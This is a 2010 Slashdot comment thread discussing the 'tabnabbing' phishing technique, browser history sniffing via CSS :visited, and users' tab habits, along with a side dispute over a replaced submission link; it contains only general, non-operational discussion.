  I read the internet for the articles.
2. Re:Not exactly. by WrongSizeGlass · 2010-05-25 01:38 · Score: 4, Interesting
  
  So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
  Exactly ... but if the 'fake' site checks your browser history for the specific fake login screens they have in their repertoire then they can show one that you have used recently.
3. Re:Not exactly. by somersault · 2010-05-25 01:39 · Score: 1
  
  Except your Facebook never times out unless you log into it on another computer or you don't tick the box to stay logged in.. which I suppose some people might if they don't know how to set up multiple accounts on their computer.
  To create a site that people will feel compelled to leave open while they go off and do something else.. that actually sounds incredibly easy - either a porn site or a "humourous" video amalgamation feed type thing which opens the links you click on in a new tab.
  
  --
  which is totally what she said
4. Re:Not exactly. by Anonymous Coward · 2010-05-25 02:06 · Score: 0
  
  The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.
  I'm one of those who often have lots of tabs open. I don't mean 50, I mean enough that Firefox gets slow to open tabs, without swapping (I recently replaced all swap with RAM, so it cannot swap). 50 tabs would be something like 4 pages worth of images (there's usually between 12 and 20 images per page), and I have more like 20 pages worth of images. I have never counted, by I would say that 200 tabs is too low.
  However, if I found a Facebook login page among those, I would not think it was one I opened deliberately. I keep my tabs well separated, and all of these 200 tabs are supposed to be pr0n. If one isn't (like those links that redirect to Google), it gets closed. If I had a Facebook account, it would be in a different browser profile. Now tell me how any of those 200 tabs would get access to THAT.
5. Re:Not exactly. by delinear · 2010-05-25 02:13 · Score: 1
  
  Except your Facebook never times out unless you log into it on another computer or you don't tick the box to stay logged in.. which I suppose some people might if they don't know how to set up multiple accounts on their computer.
  More likely users on public machines who might want to have a few windows open while they're working but don't want to have to remember to sign out if they get called away for a few hours and don't have a chance to return to their session.
  
  To create a site that people will feel compelled to leave open while they go off and do something else.. that actually sounds incredibly easy - either a porn site or a "humourous" video amalgamation feed type thing which opens the links you click on in a new tab.
  Not that easy, in fact, if you could come up with a way to create sites people never wanted to close (and to repeat the success at will, because as soon as your original phishing site got blacklisted you'd have to be able to create a bew one) then you could earn very good money legitimately without needing to phish.
6. Re:Not exactly. by nmg196 · 2010-05-25 02:13 · Score: 1
  
  How? You can't check someone's browser history using JavaScript.
7. Re:Not exactly. by causality · 2010-05-25 02:22 · Score: 1
  
  Well for example I'm logged into facebook right now. As I'm jumping from site-to-site in Tab #2, one of them could hijack the Tab #1 and make it look like a legitimate facebook login screen.
  Not exactly. From his page on this "exploit"...
  
  You can try it out on this very website (I've only tested it in Firefox). Click away to another tab for at least five seconds. Flip to another tab. Do whatever. Then come back to this tab.
  It's hard to find, isn't it? It looks exactly like Gmail. I was lazy and took a screenshot of Gmail which loads slowly. It would be better to recreate the page in HTML.
  So his "exploit" is to wait until you are away from HIS tab and then alter HIS tab to look like it is a different site.
  I use both NoScript and RequestPolicy. I am thinking that those two would make such an attack rather difficult, even if I was too lazy to pay attention to the URL before submitting login information.
  
  --
  It is a miracle that curiosity survives formal education. - Einstein
8. Re:Not exactly. by EngivalX · 2010-05-25 02:23 · Score: 1
  
  Using the css "exploit". You create a list of links that load a specific background image on the "visited" style. Your browser happily goes and loads those images on anything that's in your history.
9. Re:Not exactly. by Anonymous Coward · 2010-05-25 02:24 · Score: 0
  
  How? You can't check someone's browser history using JavaScript.
  You can do it with CSS. This was discussed just last week on Slashdot. You can't directly read the history, but you can use CSS to find out if a certain URL is in the history.
10. Re:Not exactly. by Teese · 2010-05-25 02:25 · Score: 1
  
  There's the whole visited link color issue. basically the page can see the tell what the color of a link is, and if the color is the "visited link" color, you know the user visits that page. so the page puts up a bunch of urls, checks to see which of the URLs are in the visited link color, They now know which sites you have visited somewhat recently.
  
  --
  "I'm a Genius!"*
  
  *Not an actual Genius
11. Re:Not exactly. by Anonymous Coward · 2010-05-25 02:31 · Score: 0
  
  The basic concept involves finding out what color your browser displays a link, links you've been to before are a different color. It's an old flaw that no-one seems to have fixed yet, possibly Firefox 4 will attempt to address it.
  The Register article.
12. Re:Not exactly. by hairyfeet · 2010-05-25 02:55 · Score: 1
  
  This attack also assumes everyday folks act like geeks here at /. and they don't. I don't know how many customers I have that consider a browser to be ONE window and one window only, even after switching them to FF. Those that do use tabs almost never have more than three.
  My GF is a prefect example, as she thinks I'm a genius for setting her up a bookmarked group of tabs. I set it up exactly as she like to surf, which is one tab at the Yahoo home page, one tab for her email, and one for FB. And that's it. She will NEVER add a fourth tab, even though she knows how. She says it gets "too cluttered and confusing" to even watch me run with a dozen or more tabs, and she has no desire whatsoever to try it herself. As it is now she has FB on the right, email on the left, and Yahoo in the center and she is a happy camper.
  So while this might work for a /. geek with a dozen or more tabs open, working PC repair I can say average folks just don't do that. Even after me switching them over and showing them how tabs work they simply never use that feature except very sparingly. But even with this little "exploit" I wouldn't change them off FF, no way. Having ABP cuts down on a hell of a lot of nasties and with so many still running XP FF is the safer bet.
  
  --
  ACs don't waste your time replying, your posts are never seen by me.
13. Re:Not exactly. by Qzukk · 2010-05-25 03:19 · Score: 1
  
  Not that easy, in fact, if you could come up with a way to create sites people never wanted to close
  Or just get your script embedded in someone else's website through cross-site scripting or an ad network willing to look the other way for money.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
14. Re:Not exactly. by Qzukk · 2010-05-25 03:21 · Score: 1
  
  You can't check someone's browser history using JavaScript
  You don't read slashdot enough: :visited
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
15. Re:Not exactly. by squiggleslash · 2010-05-25 03:29 · Score: 1
  
  FWIW I've seen the proof-of-concept sites that supposedly bring up every site you've ever visited, and using the system is very hit-or-miss. I have no Facebook account, for example, but the site came up, presumably because at some point in the past I clicked on a link that turned out to be a FB profile.
  Even banks might be more awkward than it appears: numerous banks and credit card companies appeared on my list of visited links, despite me not recalling ever visiting them, until I remembered that I'd done some research into getting a new card a year or so ago.
  The bottom line is that a site that uses such a system to determine the phishing sites to pick will more likely than not create numerous fake "You have been logged out" pages for sites you never logged into, and you know you never logged into.
  
  --
  You are not alone. This is not normal. None of this is normal.
16. Re:Not exactly. by somersault · 2010-05-25 03:37 · Score: 1
  
  It's weird, because I rarely have more than say 3-4 tabs open myself, even when I've got both work and play tabs going. And the first person I saw to truly use loaaads of tabs (my last gf) was not even a geek! And in fact she seemed of only average intelligence and considered herself "not very good with technology" so I was quite impressed at first. Though personally I like to maintain a clean virtual working space (my desk isn't quite so pretty) when it comes to things like my desktop and my browser, so having 10 tabs on the go does seem messy to me if you aren't using half of them for 99% of the time - especially if like me you use a separate mail client and/or a Chrome extension for interacting with GMail.
  Anyhoo, she did inspire me to start trying to leave regularly used pages open (Slashdot, Facebook, deviantArt) - only with Chrome you can do that as pinned tabs which makes it a lot more convenient than having loads of massive tabs taking up space.
  But still I've ended up just going back to using hardly any tabs and checking stuff like Facebook periodically rather than leaving it open. I guess the fact that I'm running on a netbook where having lots of tabs open can end up slowing things down doesn't help.
  
  --
  which is totally what she said
17. Re:Not exactly. by sexconker · 2010-05-25 03:48 · Score: 1
  
  Or just get your script embedded in someone else's website through cross-site scripting or an ad network willing to look the other way for money.
  
  Ad networks that are willing to look the other way for money are called "ad networks".
18. Re:Not exactly. by Sancho · 2010-05-25 03:54 · Score: 1
  
  FWIW I've seen the proof-of-concept sites that supposedly bring up every site you've ever visited, and using the system is very hit-or-miss. I have no Facebook account, for example, but the site came up, presumably because at some point in the past I clicked on a link that turned out to be a FB profile.
  That's not a miss, then, is it? You visited Facebook. It doesn't make the technique invalid in the slightest.
  
  Even banks might be more awkward than it appears: numerous banks and credit card companies appeared on my list of visited links, despite me not recalling ever visiting them, until I remembered that I'd done some research into getting a new card a year or so ago.
  The bottom line is that a site that uses such a system to determine the phishing sites to pick will more likely than not create numerous fake "You have been logged out" pages for sites you never logged into, and you know you never logged into.
  And lucky you, you won't be fooled. But if enough people are fooled, then the exploit is successful.
  Kinda like me. Every once in a while, I come across a page which tells me it's scanning for viruses. It looks just like a regular Windows XP themed window--except that I'm using Linux. But I don't go around saying how stupid or foolish the author was, or that the hack obviously doesn't work.
19. Re:Not exactly. by yotto · 2010-05-25 03:56 · Score: 1
  
  To me the big problem is that he has to create a site that people will feel compelled to leave open while they go off and do something else. That will probably be the most difficult part.
  Not at all. I frequently open a dozen or so tabs from a Google search, or news aggregator, or other such link-heavy site. Then I go through them one by one reading, disregarding, following more links, etc. Each goes into its own tab. Frequently, I get tired of a topic before the I make it though the tabs, but leave them open in case I feel like revisiting.
  I am not even compelled to leave these tabs open while doing something else. I am never on them in the first place. Tabs open in the background.
  
  --
  Pulp Audio Weekly - Geek News and Reviews
20. Re:Not exactly. by ArsenneLupin · 2010-05-25 04:16 · Score: 1
  
  That's not a miss, then, is it? You visited Facebook. It doesn't make the technique invalid in the slightest.
  It doesn't make the technique invalid, it only makes it unsuitable for this attack. Too many false positives, and people become suspicious about login tabs that seem to pop up from out of nowhere...
  But then, the history snooping works on exact URLs. These test sites were proof-of-concept, so they probably chose the target site's root URL, rather than picking a URL which would only get fetched after an actual login. A real attacker would chose his URLs more carefully.
21. Re:Not exactly. by ckaminski · 2010-05-25 04:18 · Score: 1
  
  I have two laptops. One currently has 250 tabs open, because I haven't taken the time to pare down my research links in over a month. The other has roughly 50 open, same issue. Both are running betweeen 800 and 1800MB of RAM. What I need is an improved version of Prism, where I can put tabs into real windows.
  
  Prism for IE would rule. Trying to use VMWare Lab Manager as both an admin and as a user is problematic when my tabs all share the same user profile.
22. Re:Not exactly. by squiggleslash · 2010-05-25 04:29 · Score: 1
  
  That's not a miss, then, is it? You visited Facebook. It doesn't make the technique invalid in the slightest.
  
  No, it's a miss, for the application we're talking about. The fact I "visited" a site, doesn't mean I'm a user of that site, in the sense that a history snooper is interested in. Snoopers are trying to gather information about you, whether it's to sell you viagra or to steal your passwords. So a technique that happens to register true for a large subset of websites regardless of whether the user of the webbrowser has actually spent any time there is useless.
  What you end up with, using this technique, is a situation where thousands of websites will end up in 90% of people's histories, but only a much smaller portion will actually be useful. Sure, it's quite possible the majority of people with Facebook in their histories are Facebook users, but that's only because, in my experience, the majority of web users are Facebook users. A much better question is "Do the majority of non-Facebook users actually have Facebook in their histories?" to which the answer is almost certainly "Yes."
  The :visited: hack is an interesting technique that has little technical use. Outside of a small set of speciality sites (and, no, I'm not talking porn, given porn redirects are common too) you're not going to get any useful information out of the hack that tells you what websites the user actually frequents.
  I would hazard a guess that if anyone using the technique is successful, it'll not be because they used the hack, but rather because the hack picked a popular target. That is to say, there's probably no difference in success rate for a site that puts up Facebook without checking the user's history, and a site that checks the user's history first before putting it up.
  
  --
  You are not alone. This is not normal. None of this is normal.
23. Re:Not exactly. by Manos_Of_Fate · 2010-05-25 04:33 · Score: 1
  
  I assume you're "researching" female anatomy?
  
  --
  Isn't enough that I ruined a pony, making a gift for you?
24. Re:Not exactly. by vux984 · 2010-05-25 05:07 · Score: 1
  
  I set it up exactly as she like to surf, which is one tab at the Yahoo home page, one tab for her email, and one for FB. And that's it.
  So while this might work for a /. [...] I can say average folks just don't do that.
  Don't speculate, experiment. Next time your GF leaves her computer for an extended length of time, rearrange the tabs so facebook is on the left instead of the right, and logout of facebook.
  See if she freaks out and panics or simply logs back into facebook when she gets back.
  Either way, a single data point is pretty meaningless, but I give better than 50/50 odds that when she gets back she'll log into facebook without batting an eye at it, and if she does your entire hypothesis is blown.
25. Re:Not exactly. by Actually,+I+do+RTFA · 2010-05-25 05:23 · Score: 1
  
  The idea is that these users we always hear about who never have less than 50 tabs open can't remember which tabs are which, and if you put up a Facebook login screen or something, then you'll think it's just a timed out Facebook session.
  I have a lot of tabs open right now, but I would think I would notice if someone put up a Facebook or Gmail login. Those are opened in different browsers. And a different OS for banking/anything to do with money.
  Not to mention that without javascript and/or flash, I doubt his exploit will affect me.
  
  --
  Your ad here. Ask me how!
26. Re:Not exactly. by somersault · 2010-05-25 05:53 · Score: 1
  
  I hope you have anything important bookmarked in case your machine suddenly dies and FF/Chrome/whatever can't re-open the tabs for whatever reason!
  
  --
  which is totally what she said
27. Re:Not exactly. by hairyfeet · 2010-05-25 06:37 · Score: 1
  
  You seem to be making a few assumptions bubba. One, that she actually walks away from the PC and leaves it running, which ever since her son in law jumped on her PC when she forgot and left it running and left a bunch of "free games!" spyware for me to clean, is something she does NOT do, ever. When she gets up the page is closed and she logs off, which is why she thinks I'm a genius for setting up those grouped tabs she can open in a single click. Instead of having to launch each tab individually she now sits down and hits the button and everything goes.
  Second you assume I have such disregard for my genitalia that I would go piss with her stuff. Here is one of the "Great Laws of the Universe" I bestow upon thee for free: She's in charge. You may THINK you're in charge, but you're not, she just lets you think that so you don't get your feeling hurt. My Brenda is EXTREMELY anal retentive about having everything just so, with everything in its proper place, and she tends to get...well rather cranky when things aren't where they are supposed to be. And since a cranky GF is never a good thing I'm gonna have to pass. considering how she is about order I have no doubt I'd be getting called because the "PC is broken!" if her tabs were out of order anyway.
  But the point is the average non geek (like my Brenda) don't have enough tabs open EVER to not notice identical tabs. And from TFA this exploit doesn't seem to be able to close an existing tab, simply to make one page appear to be another. Now if you have 50 tabs open this would be trivial to hide, with 2 to 3? Not so much. And since I build as well as repair computers one of the things I do is have them go through typical routines with me there so I can see usage patterns and here is what I have found:
  The average user IF they use tabs 99 times out of 100 will have one for their webmail, and one for surfing. Those that are into social networking will add one for FB. Most never do that, and simply use the Yahoo home page as a web portal, where they check their mail, "read the paper", check sports scores or their horoscope, and then use the search engine at top to get onto the "bigger web" and that's pretty much it. You'd be surprised at how many PCs I've had where I go to back up their favorites and find they have NONE, and simply use Yahoo search to get to their web pages. Folks are creatures of habit and simply don't change much. If it worked before that is how they are doing it now. Many of the average folks simply don't see the use in tabs, don't ask me why, that is just "their way" I guess.
  
  --
  ACs don't waste your time replying, your posts are never seen by me.
28. Re:Not exactly. by improfane · 2010-05-25 07:12 · Score: 1
  
  A real attacker would be smart, maybe even going so far to add some random behaviour like only opening a page in a proportion of cases.
  You could strike gold with only 1 Facebook account out of 1000 as the chances are the email password will be the same.
  
  --
  Slashdot needs Geekcode | Can anyone recommend any good SCIFI? My tastes: Foundation, Startide Rising, CITY, Ringworld,
29. Re:Not exactly. by Anonymous Coward · 2010-05-25 12:14 · Score: 0
  
  You can't know if a site has been visited recently. You can only figure out if it's been visited or not.
30. Re:Not exactly. by jp10558 · 2010-05-28 00:43 · Score: 1
  
  Seeing as I use Opera, do other users find that Firefox often can't re-open the tabs after a crash? I'm actually amazed how often it can't open the tabs. Is Chrome that bad also? Opera just about never loses the session, and if it did, there's a backed up session file you can go to to get it back.
  
  --
  Opera, Proxomitron-Grypen,GPG 0x0A1C6EE3
A little peeved! by scamdetect · 2010-05-25 01:12 · Score: 1, Informative

Dear Slashdot: I submitted the above story this morning and was pleased when it was accepted for publication on your website. However, I was a little peeved to find that the link I included in the story - was substituted in the final story with this one Obviously this substitution removes any benefit whatsoever of my having taken the time to write the blog post and submit it to slashdot in the first place. Any chance of swapping the link back?
1. Re:A little peeved! by simoncpu+was+here · 2010-05-25 01:30 · Score: 1, Insightful
  
  Are you sure this post is not a scam that is intended to drive traffic to your site?
2. Re:A little peeved! by scamdetect · 2010-05-25 01:33 · Score: 1, Interesting
  
  Ha ha! very droll!! Original submission is here
3. Re:A little peeved! by Anonymous Coward · 2010-05-25 01:36 · Score: 1, Interesting
  
  Dear Slashdot:
  I submitted the above story this morning and was pleased when it was accepted for publication on your website.
  However, I was a little peeved to find that the link I included in the story - was substituted in the final story with this one
  Obviously this substitution removes any benefit whatsoever of my having taken the time to write the blog post and submit it to slashdot in the first place.
  Any chance of swapping the link back?
  Slashdot seems to "favor" krebsonsecurity.com for some reason, and might have some behind the scenes agreement with them to shove traffic to them artificially. Please don't operate under any assumption that the /. "editor" staff is going to be fair and objective. They have their agendas, and have certainly rewrote submissions to suit their purposes in the past.
4. Re:A little peeved! by clickety6 · 2010-05-25 01:41 · Score: 5, Insightful
  
  First tab-nabbing and now submission-nabbing where the link in the article changes after submission!
  
  --
  ----------------------------------- My Other Sig Is Hilarious -----------------------------------
5. Re:A little peeved! by mysidia · 2010-05-25 01:42 · Score: 5, Insightful
  
  Slashdot is about news, not driving traffic to someone's website.
  And 'getting traffic' is not some kind of exchange or reward offered for submitting an article.
  If a different link is editorially better, then it is expected that the editors will swap it.
6. Re:A little peeved! by Anonymous Coward · 2010-05-25 01:51 · Score: 3, Insightful
  
  Regardless of which link is in the story, I still greatly benefit from you having taken the time to write the blog post and submit it to slashdot. Thank you for that.
  Oh, you meant benefit to you! What do you think slashdot is? Just a way to generate eyeballs for your personal blog? Screw you for that.
7. Re:A little peeved! by Anonymous Coward · 2010-05-25 01:55 · Score: 0
  
  Well in case you were wondering the name tabnapping was dubbed originally by a commenter on the post at Krebsonsecurity. The Firefox guy then updated his page based on that krebsonsecurity comment. You then wrote your post with a title along the lines "tabnapping." Sorry pal but Brian Krebs beat you to the punch, as evidenced by the title of your post.
8. Re:A little peeved! by Anonymous Coward · 2010-05-25 01:59 · Score: 0
  
  Dear scamdetect: You submit stories here, not links to your blog. Yours sincerely, Slashdot.
9. Re:A little peeved! by scamdetect · 2010-05-25 01:59 · Score: 1
  
  My blog is there to warn internet users about the dangers of online fraud and scams of this very nature. Whilst the posting of my article helps to do that (for which I am grateful to Slashdot) yes, I had hoped that the editors would post the article as written (including the link) as Slashdot stories are widely re-blogged and yes, I would have benefitted from the backlinks. That's a valid reason for including the link and for being disappointed that it was replaced - isn't it?
10. Re:A little peeved! by Anonymous Coward · 2010-05-25 02:07 · Score: 2, Insightful
  
  I agree it was transparently disrespectful of CmdrTaco to approve your submission, but with someone elses link. However:
  
  1. The linked article predates your linked blog according to the submission timestamps on each blog
  2. The linked article contains further links to relevant information, including a link to the original subject's website and a proof-of-concept site.
  
  I understand the euphoric feeling you got when your submission was accepted, and I also understand that sinking sensation you felt when you realized your blog was not linked-to even though your submission was accepted. That being said, repackaged news is repackaged news is repackaged news and I don't think you will find much sympathy around here that your (arguably, less useful) brand of news repackaging won't be netting you ad dollars like you intended.
11. Re:A little peeved! by roman_mir · 2010-05-25 02:14 · Score: 1
  
  at least you can't accuse this story of hypocrisy and of not living up to its expectations.
  
  --
  You can't handle the truth.
12. Re:A little peeved! by scamdetect · 2010-05-25 02:15 · Score: 1
  
  You're right, the linked to blog does pre-date mine, however it was my submission that was accepted and my form of words that makes up the body of that submission. It would have been nice to get the recognition for that work... In answer to your comment about ad dollars - I fully expect that slashdot readers don't click on ads. The ads that do appear on my site barely cover the hosting costs, let alone my time in maintaining the website.
13. Re:A little peeved! by mcgrew · 2010-05-25 02:18 · Score: 5, Insightful
  
  That's a valid reason for including the link and for being disappointed that it was replaced - isn't it?
  Not in my eyes it isn't, and I wish they'd do it more often -- like when the submission has ten ad-laden one-paragraph pages I wish they'd link to a single page view, whether that site or another. Of course you think your blog was better than krebsonsecurity, but personally I almost never click on any link with "blog" in the name, especially from slashdot. They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening.
  Be glad that they didn't rewrite the entire summary as they've done with some of my submissions.
  A submission is supposed to benefit the slashdot community, not the submitter. Too often people like you make submissions just to drive traffic to their own site for the money.
  Shame on you.
  
  --
  Free Martian Whores!
14. Re:A little peeved! by scamdetect · 2010-05-25 02:31 · Score: 1, Troll
  
  OK - let's get this straight. Submitting to Slashdot is supposed to be a selfless act and "shame on me" for being disappointed that the link was replaced because, heaven forbid, I may have made a few quid from the advertising (which by the way barely covers hosting costs) Yet Slashdot makes money from advertising on the site and from the community. That's perfectly acceptable (and yes, in my eyes it is perfectly acceptable) Why shame on me?
15. Re:A little peeved! by Anonymous Coward · 2010-05-25 02:46 · Score: 0
  
  It would have been nice to get the recognition for that work...
  But you do! At the very top it says "scamdetect writes".
16. Re:A little peeved! by Qzukk · 2010-05-25 02:59 · Score: 4, Insightful
  
  They've gotten a lot of (well deserved) flak in the past for linking a blog that links an original story, and I'm glad they're listening
  They're not listening, the blog post they substituted is still just someone bloviating about the original article and proof of concept.
  In action, it's scary in a way that just listening to some blogger yak about it doesn't get the point across, and the author points out how to use the :visited detectors and various hacks to detect if you've logged into a site or not to make it even scarier.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
17. Re:A little peeved! by Anonymous Coward · 2010-05-25 03:04 · Score: 0
  
  Slashdot is about news, not driving traffic to someone's website.
  Umm, what? You do realize the various slashdot "editors" have their own blatant biases about what sites to link to, and will certainly alter other people's submissions to suit their wants. On top of that, there is likely some behind the scenes agreements with the /. corporate overlords, since /. obviously needs some revenue to just operate. Ads can't be doing all that much, particularly since a good bulk of the /. crowd are blocking all ads to begin with.
18. Re:A little peeved! by Anonymous Coward · 2010-05-25 03:07 · Score: 0
  
  The solution is to break a story on your blog. Then not only will your submitted links stay, but when someone else's submission gets accepted, CmdrTaco will edit the submission to point to your blog.
19. Re:A little peeved! by satoshi1 · 2010-05-25 03:46 · Score: 2, Funny
  
  Because you're being a selfish prick.
20. Re:A little peeved! by scamdetect · 2010-05-25 03:55 · Score: 3, Funny
  
  Because you're being a selfish prick.
  I truly value your input. Thank you.
21. Re:A little peeved! by Anonymous Coward · 2010-05-25 04:05 · Score: 0
  
  More to the point, they altered your words and credited you for it. That's pretty bad, too.
22. Re:A little peeved! by Sancho · 2010-05-25 04:07 · Score: 1
  
  And then it includes content that he didn't write!
23. Re:A little peeved! by scamdetect · 2010-05-25 04:12 · Score: 1
  
  I would not dream of asking someone to contribute to my website and then linking to someone else's blog from their content. Would you? Of course not. Yet it's ok for /. because it's their party?
24. Re:A little peeved! by mcgrew · 2010-05-25 05:43 · Score: 1
  
  Why shame on me?
  
  Because instead of being glad your submission was accepted (and maybe linking your own blog's take on it in a comment(, you bitched about it like a spoiled little girl who didn't get her way.
  Be glad, they might have set your server on fire!
  
  --
  Free Martian Whores!
25. Re:A little peeved! by TheThiefMaster · 2010-05-25 05:51 · Score: 1
  
  It's a pity they didn't replace the link with the original source. Changing the link to some other blog adds little compared to the original link (they have a link to the original themselves, you don't, that's about it), but the source of the story is what should be referenced from a slashdot link.
So let me get this straight... by L4t3r4lu5 · 2010-05-25 01:12 · Score: 1

I'm supposed to open a tab, go to a website, open a second tab, go to a compromised website which changes the content of the first tab without my interaction, and then log on to the site presented in the first tab? Don't you think that I'll notice that I'm not on the same website I was on previously?

Seriously, all of these types of attacks rely on the user having the mental capacity of a damp shoelace. Maybe letting them get bitten every so often will teach them to pay more attention to what's going on, and not blindly click away every message box or enter details into every site they're presented with.

--
Finally had enough. Come see us over at https://soylentnews.org/
1. Re:So let me get this straight... by The+MAZZTer · 2010-05-25 01:17 · Score: 3, Informative
  
  Some people keep 100s of tabs open. They could come back hours later and see a Gmail login screen and assume they opened it at some point.
2. Re:So let me get this straight... by PatHMV · 2010-05-25 01:29 · Score: 1
  
  No, the attack knows what site you had open in tab 1, and replaces the page that had been in there with another page which appears to be from the SAME site. It will have all the right logos and so forth, and will says something like "Your Facebook session has timed out. Please log in again." ... with a very normal looking log-in button right below it. Except that you're not actually on Facebook in that tab anymore. In other words, RTFA. This is a potentially very sophisticated attack which could dupe even folks who are pretty careful about always entering web addresses directly to avoid phishing attempts.
3. Re:So let me get this straight... by TuringTest · 2010-05-25 02:20 · Score: 1
  
  Seriously, all of these types of attacks rely on the user having the mental capacity of a damp shoelace. Maybe letting them get bitten every so often will teach them to pay more attention to what's going on
  Sure, and maybe throwing people from high enough cliffs will eventually teach them how to fly.
  Short-term memory is one of the well known shortcomings of the human brain. You don't design your security procedures to rely on a long human attention span, for the same reasons that you don't design memory-hungry data structures for the algorithms that run on your smartphone. If your design does it, it's not a problem with the platform.
  
  --
  Singularity: a belief in the "God" idea with the "demiurge" relation inverted.
4. Re:So let me get this straight... by Anonymous Coward · 2010-05-25 02:56 · Score: 0
  
  I'm immune to this.
  I have the habit to never log in from a page that says my session timed out or I entered the wrong password.
  I always go to the start page of the site again and enter from there.
  I don't know why but I always follow those steps.
5. Re:So let me get this straight... by Qzukk · 2010-05-25 03:07 · Score: 2, Informative
  
  No, tab 1 is still the same site as ever, but the page you visited in tab 34 and forgot about 30 minutes ago suddenly looks like a facebook "you have timed out please log in" page. It's even used javascript to change the title of the tab and the favicon.
  Pop Quiz! Were you logged into Facebook on tab 48, tab 18, or tab 42???!?!
  All it takes is a bit of javascript inserted into a normal site using cross-site scripting, or an intentionally malicious site in the first place, or an adserver serving up whatever javascript anyone pays them to host. This is why I use NoScript.
  The original author (not linked in the submission) points out that you can use the :visited hack to choose a login screen that the user would expect to see. And you can use various other hacks to determine if the user is currently logged into some site or not.
  
  --
  If I have been able to see further than others, it is because I bought a pair of binoculars.
6. Re:So let me get this straight... by PatHMV · 2010-05-25 04:26 · Score: 1
  
  You are correct, of course. I misunderstood my first reading of the article. Though I wonder... is it possible to change tab order or close a tab with javascript? I actually do use tab order to help keep me organized. Tab 1 is whatever I'm currently surfing, for pleasure or for work. Tab 2 is my e-mail account, tab 3 is FB. Anything after that will be tabs I've opened by choosing "open in new tab" when clicking on a link, and they almost always get closed after I read the article, though occasionally one of those tabs will stick around on, say, imdb, for awhile if I anticipate using it a lot. This pretty regular tab order should then help me avoid this particular exploit.
7. Re:So let me get this straight... by Hurricane78 · 2010-05-25 04:56 · Score: 2, Insightful
  
  And it”d be their own damn fault for having such a mess.
  Seriously? You need hundreds of tabs? Did you never hear of doing first things first, and freeing your mind from other stuff? Did they never hear of bookmarks, bookmark folders and saving sessions (e.g. with TabMix Plus)?
  Sorry, but there’s a point at with you just deserve it. This is one of them. Like cockroaches in a apartment that looks like a garbage dump.
  
  --
  Any sufficiently advanced intelligence is indistinguishable from stupidity.
8. Re:So let me get this straight... by cshay · 2010-05-25 10:46 · Score: 1
  
  There you go again, posting with a judgement about how people use their software. Let it go. You are not superior in your orderliness. I am not superior with my currently open 150 tabs. Everyone uses software differently. That is why there are preferences pages and plug ins. Open your mind and understand that brains process things differently. Some require order, some struggle under excessive orderliness. When you accept that, you can learn to be a UI designer.
9. Re:So let me get this straight... by cshay · 2010-05-25 10:48 · Score: 1
  
  As one more example, I have 90,000 messages in my inbox. Some I have never read. I don't use the trash. What I do use are very intelligent filtering and flagging and google searching to find stuff I need. This is different from you 15 messages and orderly sorted folders I am sure, but you can't say one is superior to the other. Its the way ones mind works. We are not all the same.
10. Re:So let me get this straight... by L4t3r4lu5 · 2010-05-25 23:02 · Score: 1
  
  He just does the legwork of organising his stuff once, whereas you do it every time you want to find something.
  
  If anything, his way is better because the result is less total work. He's lazier, and therefore more organised.
  
  --
  Finally had enough. Come see us over at https://soylentnews.org/
11. Re:So let me get this straight... by Anonymous Coward · 2010-05-26 05:26 · Score: 0
  
  I often (almost always) have over 100 tabs open. Unless I KNOW I have a tab open for a particular site, I will just open a new one to check my email. Really, when you have 100 tabs open what's one more?
12. Re:So let me get this straight... by cshay · 2010-05-27 21:53 · Score: 1
  
  What are you talking about? I *never* organize anything. I rely on powerful search engines (Google Desktop) to find what I want in my inbox. I am the king of laziness.
No tab? by smaerd · 2010-05-25 01:14 · Score: 1

Just give me something without sugar!
1. Re:No tab? by flyingfsck · 2010-05-25 01:56 · Score: 1
  
  That will whoosh over the heads of 99.999% of people who never heard of Coke Tab.
  
  --
  Excuse me, but please get off my Pennisetum Clandestinum, eh!
if these geniuses by circletimessquare · 2010-05-25 01:16 · Score: 1

who develop these attack vectors used half of their creativity on a legitimate purpose, they'd make 10x the money and earn it completely honestly
i mean this is a brilliant attack. so, whoever thought this up, why aren't you making millions in a respectable way? you obviously have the brains to do that
some people just have to be assholes

--
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
1. Re:if these geniuses by ascari · 2010-05-25 01:31 · Score: 1
  
  Really? I take it you've never tried starting a business? Things like "brilliant" and "brains" often have very little to do with eventual success. Just take a look around you if you need hard evidence.
  Additionally, there are places on the planet (including parts of the US and Western Europe) where opportunities still are limited even for smart people. The Internet and associated scams have opened up possibilities for "geniuses" in such places. So if you ask those geniuses the classic question "If you're so smart how come you're not a millionaire?" they might just answer "Well I'm on my way with this new clever scam of mine."
  So in the end novel and clever forms of malfeasance might just be the "proper" action based on a cost benefit analysis. Or they might just be assholes. Or both.
2. Re:if these geniuses by delinear · 2010-05-25 03:19 · Score: 1
  
  Spot on, I've met lots of socially challenged but incredibly intelligent people working in development, and I've met lots of socially adept idiots in management/ownership positions - getting ahead in business is far often much more about how confident you are and how you sell yourself to others (and how good you are at making them feel important) than how brainy you are. Chances are if the average nerd comes up with a world shattering idea, he'll be lucky to get a pat on the back while his boss (or more likely his boss's boss) gets the new Ferrarri - not advocating that nerds turn to crime, but I've seen this pattern far too often for it to be a mere coincidence.
3. Re:if these geniuses by lwsimon · 2010-05-25 03:58 · Score: 1
  
  Agreed. My motto in business is: "Many people far less intelligent and talented that I have succeeded at this. Suck it up, and move on."
  
  --
  Learn about Photography Basics.
4. Re:if these geniuses by Garble+Snarky · 2010-05-25 03:58 · Score: 2, Insightful
  
  A legitimate purpose like, say, significant development work on a well-known, large-scale open source project, such as Firefox?
  
  All you had to read was the first sentence of the summary...
5. Re:if these geniuses by Tablizer · 2010-05-25 04:31 · Score: 1
  
  who develop these attack vectors used half of their creativity on a legitimate purpose, they'd make 10x the money and earn it completely honestly
  Some people "naturally" get off on being sneaky and underhanded. Being evil releases endorphins in them.
  
  --
  Table-ized A.I.
Solution... by morkus · 2010-05-25 01:16 · Score: 1, Interesting

Simple solution - don't use tabs in browsers. The first thing I do to any browser I sit in front of, is to immediately disable the use of tabs. I have never understood why many people think they are a good idea - I think they break a heap of good UI principles.
